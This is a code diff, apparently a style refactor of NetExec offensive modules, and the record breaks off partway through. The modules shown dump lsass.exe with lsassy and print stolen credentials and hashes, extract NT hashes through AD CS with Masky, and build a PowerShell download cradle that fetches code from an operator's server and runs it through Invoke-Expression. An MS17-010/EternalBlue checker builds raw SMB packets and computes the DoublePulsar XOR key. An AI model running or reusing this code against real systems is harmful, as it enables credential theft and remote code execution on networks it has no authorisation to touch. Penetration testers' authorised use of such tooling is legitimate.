if ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is True:
|
||||||
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')
|
context.log.highlight('LDAPS Channel Binding is set to "When Supported"')
|
||||||
elif ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == False:
|
elif ldapsChannelBindingAlwaysCheck is False and ldapsChannelBindingWhenSupportedCheck is False:
|
||||||
context.log.highlight('LDAPS Channel Binding is set to "NEVER"')
|
context.log.highlight('LDAPS Channel Binding is set to "NEVER"')
|
||||||
elif ldapsChannelBindingAlwaysCheck == True:
|
elif ldapsChannelBindingAlwaysCheck is True:
|
||||||
context.log.fail('LDAPS Channel Binding is set to "Required"')
|
context.log.fail('LDAPS Channel Binding is set to "Required"')
|
||||||
else:
|
else:
|
||||||
context.log.fail("\nSomething went wrong...")
|
context.log.fail("\nSomething went wrong...")
|
||||||
exit()
|
sys.exit()
|
||||||
else:
|
else:
|
||||||
context.log.fail(connection.domain + " - cannot complete TLS handshake, cert likely not configured")
|
context.log.fail(connection.domain + " - cannot complete TLS handshake, cert likely not configured")
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# Author:
|
# Author:
|
||||||
# Romain Bentz (pixis - @hackanddo)
|
# Romain Bentz (pixis - @hackanddo)
|
||||||
# Website:
|
# Website:
|
||||||
|
@ -27,9 +25,7 @@ class NXCModule:
|
||||||
self.method = None
|
self.method = None
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""METHOD Method to use to dump lsass.exe with lsassy"""
|
||||||
METHOD Method to use to dump lsass.exe with lsassy
|
|
||||||
"""
|
|
||||||
self.method = "comsvcs"
|
self.method = "comsvcs"
|
||||||
if "METHOD" in module_options:
|
if "METHOD" in module_options:
|
||||||
self.method = module_options["METHOD"]
|
self.method = module_options["METHOD"]
|
||||||
|
@ -60,7 +56,7 @@ class NXCModule:
|
||||||
|
|
||||||
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
dumper = Dumper(session, timeout=10, time_between_commands=7).load(self.method)
|
||||||
if dumper is None:
|
if dumper is None:
|
||||||
context.log.fail("Unable to load dump method '{}'".format(self.method))
|
context.log.fail(f"Unable to load dump method '{self.method}'")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
file = dumper.dump()
|
file = dumper.dump()
|
||||||
|
@ -75,13 +71,13 @@ class NXCModule:
|
||||||
credentials, tickets, masterkeys = parsed
|
credentials, tickets, masterkeys = parsed
|
||||||
|
|
||||||
file.close()
|
file.close()
|
||||||
context.log.debug(f"Closed dumper file")
|
context.log.debug("Closed dumper file")
|
||||||
file_path = file.get_file_path()
|
file_path = file.get_file_path()
|
||||||
context.log.debug(f"File path: {file_path}")
|
context.log.debug(f"File path: {file_path}")
|
||||||
try:
|
try:
|
||||||
deleted_file = ImpacketFile.delete(session, file_path)
|
deleted_file = ImpacketFile.delete(session, file_path)
|
||||||
if deleted_file:
|
if deleted_file:
|
||||||
context.log.debug(f"Deleted dumper file")
|
context.log.debug("Deleted dumper file")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}")
|
context.log.fail(f"[OPSEC] No exception, but failed to delete file: {file_path}")
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -119,7 +115,7 @@ class NXCModule:
|
||||||
)
|
)
|
||||||
credentials_output.append(cred)
|
credentials_output.append(cred)
|
||||||
|
|
||||||
context.log.debug(f"Calling process_credentials")
|
context.log.debug("Calling process_credentials")
|
||||||
self.process_credentials(context, connection, credentials_output)
|
self.process_credentials(context, connection, credentials_output)
|
||||||
|
|
||||||
def process_credentials(self, context, connection, credentials):
|
def process_credentials(self, context, connection, credentials):
|
||||||
|
@ -128,7 +124,7 @@ class NXCModule:
|
||||||
credz_bh = []
|
credz_bh = []
|
||||||
domain = None
|
domain = None
|
||||||
for cred in credentials:
|
for cred in credentials:
|
||||||
if cred["domain"] == None:
|
if cred["domain"] is None:
|
||||||
cred["domain"] = ""
|
cred["domain"] = ""
|
||||||
domain = cred["domain"]
|
domain = cred["domain"]
|
||||||
if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper():
|
if "." not in cred["domain"] and cred["domain"].upper() in connection.domain.upper():
|
||||||
|
@ -157,7 +153,7 @@ class NXCModule:
|
||||||
def print_credentials(context, domain, username, password, lmhash, nthash):
|
def print_credentials(context, domain, username, password, lmhash, nthash):
|
||||||
if password is None:
|
if password is None:
|
||||||
password = ":".join(h for h in [lmhash, nthash] if h is not None)
|
password = ":".join(h for h in [lmhash, nthash] if h is not None)
|
||||||
output = "%s\\%s %s" % (domain, username, password)
|
output = f"{domain}\\{username} {password}"
|
||||||
context.log.highlight(output)
|
context.log.highlight(output)
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from masky import Masky
|
from masky import Masky
|
||||||
from nxc.helpers.bloodhound import add_user_bh
|
from nxc.helpers.bloodhound import add_user_bh
|
||||||
|
|
||||||
|
@ -13,7 +10,7 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
CA Certificate Authority Name (CA_SERVER\CA_NAME)
|
CA Certificate Authority Name (CA_SERVER\CA_NAME)
|
||||||
TEMPLATE Template name allowing users to authenticate with (default: User)
|
TEMPLATE Template name allowing users to authenticate with (default: User)
|
||||||
DC_IP IP Address of the domain controller
|
DC_IP IP Address of the domain controller
|
||||||
|
@ -40,7 +37,7 @@ class NXCModule:
|
||||||
|
|
||||||
def on_admin_login(self, context, connection):
|
def on_admin_login(self, context, connection):
|
||||||
if not self.ca:
|
if not self.ca:
|
||||||
context.log.fail("Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
|
context.log.fail(r"Please provide a valid CA server and CA name (CA_SERVER\CA_NAME)")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
host = connection.host
|
host = connection.host
|
||||||
|
@ -85,7 +82,7 @@ class NXCModule:
|
||||||
pwned_users = 0
|
pwned_users = 0
|
||||||
for user in rslts.users:
|
for user in rslts.users:
|
||||||
if user.nthash:
|
if user.nthash:
|
||||||
context.log.highlight(f"{user.domain}\{user.name} {user.nthash}")
|
context.log.highlight(f"{user.domain}\\{user.name} {user.nthash}")
|
||||||
self.process_credentials(connection, context, user)
|
self.process_credentials(connection, context, user)
|
||||||
pwned_users += 1
|
pwned_users += 1
|
||||||
|
|
||||||
|
@ -115,7 +112,7 @@ class NXCModule:
|
||||||
|
|
||||||
if not tracker.files_cleaning_success:
|
if not tracker.files_cleaning_success:
|
||||||
context.log.fail("Fail to clean files related to Masky")
|
context.log.fail("Fail to clean files related to Masky")
|
||||||
context.log.fail((f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', " f"'{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'"))
|
context.log.fail(f"Please remove the files named '{tracker.agent_filename}', '{tracker.error_filename}', '{tracker.output_filename}' & '{tracker.args_filename}' within the folder '\\Windows\\Temp\\'")
|
||||||
ret = False
|
ret = False
|
||||||
|
|
||||||
if not tracker.svc_cleaning_success:
|
if not tracker.svc_cleaning_success:
|
||||||
|
|
|
@ -1,6 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
|
|
||||||
from sys import exit
|
from sys import exit
|
||||||
|
|
||||||
|
|
||||||
|
@ -41,7 +38,6 @@ class NXCModule:
|
||||||
Set payload to what you want (windows/meterpreter/reverse_https, etc)
|
Set payload to what you want (windows/meterpreter/reverse_https, etc)
|
||||||
after running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that
|
after running, copy the end of the URL printed (e.g. M5LemwmDHV) and set RAND to that
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.met_ssl = "https"
|
self.met_ssl = "https"
|
||||||
|
|
||||||
if "SRVHOST" not in module_options or "SRVPORT" not in module_options:
|
if "SRVHOST" not in module_options or "SRVPORT" not in module_options:
|
||||||
|
@ -60,7 +56,7 @@ class NXCModule:
|
||||||
# stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
|
# stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
|
||||||
command = """$url="{}://{}:{}/{}"
|
command = """$url="{}://{}:{}/{}"
|
||||||
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
|
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
|
||||||
$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
|
$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'
|
||||||
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
|
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
|
||||||
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
|
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
|
||||||
$ProcessInfo.FileName=$PowershellExe
|
$ProcessInfo.FileName=$PowershellExe
|
||||||
|
|
|
@ -1,31 +1,14 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
# All credits to https://github.com/d4t4s3c/Win7Blue
|
# All credits to https://github.com/d4t4s3c/Win7Blue
|
||||||
# @d4t4s3c
|
# @d4t4s3c
|
||||||
# Module by @mpgn_x64
|
# Module by @mpgn_x64
|
||||||
|
|
||||||
from ctypes import *
|
from ctypes import c_uint8, c_uint16, c_uint32, c_uint64, Structure
|
||||||
import socket
|
import socket
|
||||||
import struct
|
import struct
|
||||||
|
from nxc.logger import nxc_logger
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class SmbHeader(Structure):
|
||||||
name = "ms17-010"
|
|
||||||
description = "MS17-010, /!\ not tested oustide home lab"
|
|
||||||
supported_protocols = ["smb"]
|
|
||||||
opsec_safe = True
|
|
||||||
multiple_hosts = True
|
|
||||||
|
|
||||||
def options(self, context, module_options):
|
|
||||||
""" """
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
|
||||||
if check(connection.host):
|
|
||||||
context.log.highlight("VULNERABLE")
|
|
||||||
context.log.highlight("Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/")
|
|
||||||
|
|
||||||
|
|
||||||
class SMB_HEADER(Structure):
|
|
||||||
"""SMB Header decoder."""
|
"""SMB Header decoder."""
|
||||||
|
|
||||||
_pack_ = 1
|
_pack_ = 1
|
||||||
|
@ -47,292 +30,474 @@ class SMB_HEADER(Structure):
|
||||||
("multiplex_id", c_uint16),
|
("multiplex_id", c_uint16),
|
||||||
]
|
]
|
||||||
|
|
||||||
|
def __init__(self, buffer):
|
||||||
|
nxc_logger.debug("server_component : %04x" % self.server_component)
|
||||||
|
nxc_logger.debug("smb_command : %01x" % self.smb_command)
|
||||||
|
nxc_logger.debug("error_class : %01x" % self.error_class)
|
||||||
|
nxc_logger.debug("error_code : %02x" % self.error_code)
|
||||||
|
nxc_logger.debug("flags : %01x" % self.flags)
|
||||||
|
nxc_logger.debug("flags2 : %02x" % self.flags2)
|
||||||
|
nxc_logger.debug("process_id_high : %02x" % self.process_id_high)
|
||||||
|
nxc_logger.debug("signature : %08x" % self.signature)
|
||||||
|
nxc_logger.debug("reserved2 : %02x" % self.reserved2)
|
||||||
|
nxc_logger.debug("tree_id : %02x" % self.tree_id)
|
||||||
|
nxc_logger.debug("process_id : %02x" % self.process_id)
|
||||||
|
nxc_logger.debug("user_id : %02x" % self.user_id)
|
||||||
|
nxc_logger.debug("multiplex_id : %02x" % self.multiplex_id)
|
||||||
|
|
||||||
def __new__(self, buffer=None):
|
def __new__(self, buffer=None):
|
||||||
|
nxc_logger.debug(f"Creating SMB_HEADER object from buffer: {buffer}")
|
||||||
return self.from_buffer_copy(buffer)
|
return self.from_buffer_copy(buffer)
|
||||||
|
|
||||||
|
|
||||||
def generate_smb_proto_payload(*protos):
|
class NXCModule:
|
||||||
"""Generate SMB Protocol. Pakcet protos in order."""
|
name = "ms17-010"
|
||||||
hexdata = []
|
description = "MS17-010 - EternalBlue - NOT TESTED OUTSIDE LAB ENVIRONMENT"
|
||||||
for proto in protos:
|
supported_protocols = ["smb"]
|
||||||
hexdata.extend(proto)
|
opsec_safe = True
|
||||||
return "".join(hexdata)
|
multiple_hosts = True
|
||||||
|
|
||||||
|
def options(self, context, module_options):
|
||||||
|
""" """
|
||||||
|
self.logger = context.log
|
||||||
|
|
||||||
|
def on_login(self, context, connection):
|
||||||
|
try:
|
||||||
|
if self.check(connection.host):
|
||||||
|
context.log.highlight("VULNERABLE")
|
||||||
|
context.log.highlight("Next step: https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/")
|
||||||
|
except ConnectionResetError as e:
|
||||||
|
context.log.debug(f"Error connecting to host when checking for MS17-010: {e!s}")
|
||||||
|
except ValueError as e:
|
||||||
|
if str(e) == "Buffer size too small (0 instead of at least 32 bytes)":
|
||||||
|
context.log.debug("Buffer size too small, which means the response was not the expected size")
|
||||||
|
|
||||||
|
|
||||||
def calculate_doublepulsar_xor_key(s):
|
def generate_smb_proto_payload(self, *protos):
|
||||||
"""Calaculate Doublepulsar Xor Key"""
|
"""
|
||||||
x = 2 * s ^ (((s & 0xFF00 | (s << 16)) << 8) | (((s >> 16) | s & 0xFF0000) >> 8))
|
Flattens a nested list and merges all bytes objects into a single bytes object.
|
||||||
x = x & 0xFFFFFFFF
|
|
||||||
return x
|
Args:
|
||||||
|
----
|
||||||
|
*protos (list): The list to flatten and merge.
|
||||||
|
|
||||||
|
Returns:
|
||||||
|
-------
|
||||||
|
bytes: The merged bytes object.
|
||||||
|
"""
|
||||||
|
self.logger.debug("generate smb proto payload")
|
||||||
|
self.logger.debug(f"Protos: {protos}")
|
||||||
|
|
||||||
|
hex_data = b""
|
||||||
|
for proto in protos:
|
||||||
|
if isinstance(proto, list):
|
||||||
|
hex_data += self.generate_smb_proto_payload(*proto)
|
||||||
|
elif isinstance(proto, bytes):
|
||||||
|
hex_data += proto
|
||||||
|
|
||||||
|
self.logger.debug(f"Packed proto data: {hex_data}")
|
||||||
|
return hex_data
|
||||||
|
|
||||||
|
|
||||||
def negotiate_proto_request():
|
def calculate_doublepulsar_xor_key(self, s):
|
||||||
"""Generate a negotiate_proto_request packet."""
|
"""
|
||||||
netbios = ["\x00", "\x00\x00\x54"]
|
Calculate Doublepulsar Xor Key.
|
||||||
|
|
||||||
smb_header = [
|
Args:
|
||||||
"\xFF\x53\x4D\x42",
|
----
|
||||||
"\x72",
|
s (int): The input value.
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x18",
|
|
||||||
"\x01\x28",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x2F\x4B",
|
|
||||||
"\x00\x00",
|
|
||||||
"\xC5\x5E",
|
|
||||||
]
|
|
||||||
|
|
||||||
negotiate_proto_request = [
|
Returns:
|
||||||
"\x00",
|
-------
|
||||||
"\x31\x00",
|
int: The calculated xor key.
|
||||||
"\x02",
|
"""
|
||||||
"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00",
|
nxc_logger.debug(f"Calculating Doublepulsar XOR key for: {s}")
|
||||||
"\x02",
|
x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))
|
||||||
"\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00",
|
return x & 0xffffffff # truncate to 32 bits
|
||||||
"\x02",
|
|
||||||
"\x4E\x54\x20\x4C\x41\x4E\x4D\x41\x4E\x20\x31\x2E\x30\x00",
|
|
||||||
"\x02",
|
|
||||||
"\x4E\x54\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, negotiate_proto_request)
|
|
||||||
|
|
||||||
|
|
||||||
def session_setup_andx_request():
|
|
||||||
"""Generate session setuo andx request."""
|
|
||||||
netbios = ["\x00", "\x00\x00\x63"]
|
|
||||||
|
|
||||||
smb_header = [
|
def negotiate_proto_request(self):
|
||||||
"\xFF\x53\x4D\x42",
|
"""Generate a negotiate_proto_request packet."""
|
||||||
"\x73",
|
self.logger.debug("generate negotiate proto request")
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x18",
|
|
||||||
"\x01\x20",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x2F\x4B",
|
|
||||||
"\x00\x00",
|
|
||||||
"\xC5\x5E",
|
|
||||||
]
|
|
||||||
|
|
||||||
session_setup_andx_request = [
|
# Define the NetBIOS header
|
||||||
"\x0D",
|
netbios = [
|
||||||
"\xFF",
|
b"\x00", # Message Type
|
||||||
"\x00",
|
b"\x00\x00\x54", # Length
|
||||||
"\x00\x00",
|
]
|
||||||
"\xDF\xFF",
|
|
||||||
"\x02\x00",
|
|
||||||
"\x01\x00",
|
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x40\x00\x00\x00",
|
|
||||||
"\x26\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x2e\x00",
|
|
||||||
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x32\x31\x39\x35\x00",
|
|
||||||
"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x35\x2e\x30\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, session_setup_andx_request)
|
# Define the SMB header
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # Server Component
|
||||||
|
b"\x72", # SMB Command
|
||||||
|
b"\x00\x00\x00\x00", # NT Status
|
||||||
|
b"\x18", # Flags
|
||||||
|
b"\x01\x28", # Flags2
|
||||||
|
b"\x00\x00", # Process ID High
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # Signature
|
||||||
|
b"\x00\x00", # Reserved
|
||||||
|
b"\x00\x00", # Tree ID
|
||||||
|
b"\x2F\x4B", # Process ID
|
||||||
|
b"\x00\x00", # User ID
|
||||||
|
b"\xC5\x5E", # Multiplex ID
|
||||||
|
]
|
||||||
|
|
||||||
|
# Define the negotiate_proto_request
|
||||||
|
negotiate_proto_request = [
|
||||||
|
b"\x00", # Word Count
|
||||||
|
b"\x31\x00", # Byte Count
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00", # Requested Dialects: LANMAN1.0
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4C\x4D\x31\x2E\x32\x58\x30\x30\x32\x00", # Requested Dialects: LM1.2X002
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4E\x54\x20\x4C\x41\x4E\x4D\x41\x4E\x20\x31\x2E\x30\x00", # Requested Dialects: NT LANMAN 1.0
|
||||||
|
b"\x02", # Requested Dialects Count
|
||||||
|
b"\x4E\x54\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00", # Requested Dialects: NT LM 0.12
|
||||||
|
]
|
||||||
|
|
||||||
|
# Return the generated SMB protocol payload
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, negotiate_proto_request)
|
||||||
|
|
||||||
|
|
||||||
def tree_connect_andx_request(ip, userid):
|
def session_setup_andx_request(self):
|
||||||
"""Generate tree connect andx request."""
|
"""Generate session setup andx request."""
|
||||||
|
self.logger.debug("generate session setup andx request"
|
||||||
|
)
|
||||||
|
# Define the NetBIOS bytes
|
||||||
|
netbios = [
|
||||||
|
b"\x00", # length
|
||||||
|
b"\x00\x00\x63", # session service
|
||||||
|
]
|
||||||
|
|
||||||
netbios = ["\x00", "\x00\x00\x47"]
|
# Define the SMB header bytes
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # server component: .SMB
|
||||||
|
b"\x73", # command: Session Setup AndX
|
||||||
|
b"\x00\x00\x00\x00", # NT status
|
||||||
|
b"\x18", # flags
|
||||||
|
b"\x01\x20", # flags2
|
||||||
|
b"\x00\x00", # PID high
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # signature
|
||||||
|
b"\x00\x00", # reserved
|
||||||
|
b"\x00\x00", # tree id
|
||||||
|
b"\x2F\x4B", # pid
|
||||||
|
b"\x00\x00", # uid
|
||||||
|
b"\xC5\x5E", # multiplex id
|
||||||
|
]
|
||||||
|
|
||||||
smb_header = [
|
# Define the session setup andx request bytes
|
||||||
"\xFF\x53\x4D\x42",
|
session_setup_andx_request = [
|
||||||
"\x75",
|
b"\x0D", # word count
|
||||||
"\x00\x00\x00\x00",
|
b"\xFF", # andx command: no further commands
|
||||||
"\x18",
|
b"\x00", # reserved
|
||||||
"\x01\x20",
|
b"\x00\x00", # andx offset
|
||||||
"\x00\x00",
|
b"\xDF\xFF", # max buffer
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
b"\x02\x00", # max mpx count
|
||||||
"\x00\x00",
|
b"\x01\x00", # VC number
|
||||||
"\x00\x00",
|
b"\x00\x00\x00\x00", # session key
|
||||||
"\x2F\x4B",
|
b"\x00\x00", # ANSI password length
|
||||||
userid,
|
b"\x00\x00", # Unicode password length
|
||||||
"\xC5\x5E",
|
b"\x00\x00\x00\x00", # reserved
|
||||||
]
|
b"\x40\x00\x00\x00", # capabilities
|
||||||
|
b"\x26\x00", # byte count
|
||||||
|
b"\x00", # account
|
||||||
|
b"\x2e\x00", # primary domain
|
||||||
|
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x32\x31\x39\x35\x00", # Native OS: Windows 2000 2195
|
||||||
|
b"\x57\x69\x6e\x64\x6f\x77\x73\x20\x32\x30\x30\x30\x20\x35\x2e\x30\x00", # Native OS: Windows 2000 5.0
|
||||||
|
]
|
||||||
|
|
||||||
ipc = "\\\\{}\IPC$\x00".format(ip)
|
return self.generate_smb_proto_payload(netbios, smb_header, session_setup_andx_request)
|
||||||
|
|
||||||
tree_connect_andx_request = [
|
|
||||||
"\x04",
|
|
||||||
"\xFF",
|
|
||||||
"\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x01\x00",
|
|
||||||
"\x1A\x00",
|
|
||||||
"\x00",
|
|
||||||
ipc.encode(),
|
|
||||||
"\x3f\x3f\x3f\x3f\x3f\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
length = len("".join(smb_header)) + len("".join(tree_connect_andx_request))
|
|
||||||
|
|
||||||
netbios[1] = struct.pack(">L", length)[-3:]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, tree_connect_andx_request)
|
|
||||||
|
|
||||||
|
|
||||||
def peeknamedpipe_request(treeid, processid, userid, multiplex_id):
|
def tree_connect_andx_request(self, ip, userid):
|
||||||
"""Generate tran2 request"""
|
"""Generate tree connect andx request.
|
||||||
|
|
||||||
netbios = ["\x00", "\x00\x00\x4a"]
|
Args:
|
||||||
|
----
|
||||||
|
ip (str): The IP address.
|
||||||
|
userid (str): The user ID.
|
||||||
|
|
||||||
smb_header = [
|
Returns:
|
||||||
"\xFF\x53\x4D\x42",
|
-------
|
||||||
"\x25",
|
bytes: The generated tree connect andx request payload.
|
||||||
"\x00\x00\x00\x00",
|
"""
|
||||||
"\x18",
|
self.logger.debug("generate tree connect andx request")
|
||||||
"\x01\x28",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
treeid,
|
|
||||||
processid,
|
|
||||||
userid,
|
|
||||||
multiplex_id,
|
|
||||||
]
|
|
||||||
|
|
||||||
tran_request = [
|
# Initialize the netbios header
|
||||||
"\x10",
|
netbios = [
|
||||||
"\x00\x00",
|
b"\x00", # 'Message_Type'
|
||||||
"\x00\x00",
|
b"\x00\x00\x47" # 'Length'
|
||||||
"\xff\xff",
|
]
|
||||||
"\xff\xff",
|
|
||||||
"\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x4a\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x4a\x00",
|
|
||||||
"\x02",
|
|
||||||
"\x00",
|
|
||||||
"\x23\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x07\x00",
|
|
||||||
"\x5c\x50\x49\x50\x45\x5c\x00",
|
|
||||||
]
|
|
||||||
|
|
||||||
return generate_smb_proto_payload(netbios, smb_header, tran_request)
|
# Initialize the SMB header
|
||||||
|
smb_header = [
|
||||||
|
b"\xFF\x53\x4D\x42", # server_compnent: .SMB
|
||||||
|
b"\x75", # smb_command: Tree Connect AndX
|
||||||
|
b"\x00\x00\x00\x00", # 'nt_status'
|
||||||
|
b"\x18", # 'flags'
|
||||||
|
b"\x01\x20", # 'flags2'
|
||||||
|
b"\x00\x00", # 'process_id_high'
|
||||||
|
b"\x00\x00\x00\x00\x00\x00\x00\x00", # 'signature'
|
||||||
|
b"\x00\x00", # 'reserved'
|
||||||
|
b"\x00\x00", # 'tree_id'
|
||||||
|
b"\x2F\x4B", # 'process_id'
|
||||||
|
userid, # 'user_id'
|
||||||
|
b"\xC5\x5E", # 'multiplex_id'
|
||||||
|
]
|
||||||
|
|
||||||
|
# Create the IPC string
|
||||||
|
ipc = f"\\\\{ip}\\IPC$\x00"
|
||||||
|
self.logger.debug(f"Connecting to {ip} with UID: {userid.hex()}")
|
||||||
|
|
||||||
|
# Initialize the tree connect andx request
|
||||||
|
tree_connect_andx_request = [
|
||||||
|
b"\x04", # Word Count
|
||||||
|
b"\xFF", # AndXCommand: No further commands
|
||||||
|
b"\x00", # Reserved
|
||||||
|
b"\x00\x00", # AndXOffset
|
||||||
|
b"\x00\x00", # Flags
|
||||||
|
b"\x01\x00", # Password Length
|
||||||
|
b"\x1A\x00", # Byte Count
|
||||||
|
b"\x00", # Password
|
||||||
|
ipc.encode(), # \\xxx.xxx.xxx.xxx\IPC$
|
||||||
|
b"\x3f\x3f\x3f\x3f\x3f\x00", # Service
|
||||||
|
]
|
||||||
|
|
||||||
|
# Calculate the length of the payload
|
||||||
|
length = len(b"".join(smb_header)) + len(b"".join(tree_connect_andx_request))
|
||||||
|
self.logger.debug(f"Length of payload: {length}")
|
||||||
|
|
||||||
|
# Update the length in the netbios header
|
||||||
|
netbios[1] = struct.pack(">L", length)[-3:]
|
||||||
|
|
||||||
|
self.logger.debug(f"Netbios: {netbios}")
|
||||||
|
self.logger.debug(f"SMB Header: {smb_header}")
|
||||||
|
self.logger.debug(f"Tree Connect AndX Request: {tree_connect_andx_request}")
|
||||||
|
|
||||||
|
# Generate the final SMB protocol payload
|
||||||
|
return self.generate_smb_proto_payload(netbios, smb_header, tree_connect_andx_request)
|
||||||
|
|
||||||
|
|
||||||
def trans2_request(treeid, processid, userid, multiplex_id):
|
def peeknamedpipe_request(self, treeid, processid, userid, multiplex_id):
|
||||||
"""Generate trans2 request."""
|
"""
|
||||||
|
Generate tran2 request.
|
||||||
|
|
||||||
netbios = ["\x00", "\x00\x00\x4f"]
|
Args:
|
||||||
|
----
|
||||||
|
treeid (str): The tree ID.
|
||||||
|
processid (str): The process ID.
|
||||||
|
userid (str): The user ID.
|
||||||
|
multiplex_id (str): The multiplex ID.
|
||||||
|
|
||||||
smb_header = [
|
Returns:
|
||||||
"\xFF\x53\x4D\x42",
|
-------
|
||||||
"\x32",
|
str: The generated SMB protocol payload.
|
||||||
"\x00\x00\x00\x00",
|
"""
|
||||||
"\x18",
|
self.logger.debug("generate peeknamedpipe request")
|
||||||
"\x07\xc0",
|
|
||||||
"\x00\x00",
|
|
||||||
"\x00\x00\x00\x00\x00\x00\x00\x00",
|
|
||||||
"\x00\x00",
|
|
||||||
treeid,
|
|
||||||
processid,
|
|
||||||
userid,
|
|
||||||
multiplex_id,
|
|
||||||
]
|
|
||||||
|
|
||||||
trans2_request = [
|
# Set the necessary values for the netbios header
|
||||||
"\x0f",
|
netbios = [
|
||||||
"\x0c\x00",
|
b"\x00", # message type
|
||||||
"\x00\x00",
|
b"\x00\x00\x4a" # length
|
||||||
"\x01\x00",
|
]
|
||||||
"\x00\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x00",
|
|
||||||
"\x00\x00",
|
